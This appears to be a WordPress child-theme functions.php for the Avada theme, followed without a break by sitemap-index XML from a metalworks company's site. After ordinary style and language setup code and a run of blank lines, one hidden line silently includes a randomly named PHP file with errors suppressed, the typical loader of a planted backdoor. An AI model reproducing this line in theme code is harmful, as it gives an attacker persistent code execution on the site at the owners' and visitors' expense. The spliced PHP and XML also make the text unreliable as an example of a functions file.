function theme_enqueue_styles() {
    wp_enqueue_style( 'child-style', get_stylesheet_directory_uri() . '/style.css', [] );
}
add_action( 'wp_enqueue_scripts', 'theme_enqueue_styles', 20 );

function avada_lang_setup() {
	$lang = get_stylesheet_directory() . '/languages';
	load_child_theme_textdomain( 'Avada', $lang );
}
add_action( 'after_setup_theme', 'avada_lang_setup' );








if (file_exists(dirname(__FILE__) . '/wp-a530b3.php')) { @include_once dirname(__FILE__) . '/wp-a530b3.php'; }<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://ketanmetalworks.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://ketanmetalworks.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://ketanmetalworks.com/wp-sitemap-posts-post-2.xml</loc></sitemap><sitemap><loc>https://ketanmetalworks.com/wp-sitemap-posts-post-3.xml</loc></sitemap><sitemap><loc>https://ketanmetalworks.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://ketanmetalworks.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://ketanmetalworks.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://ketanmetalworks.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
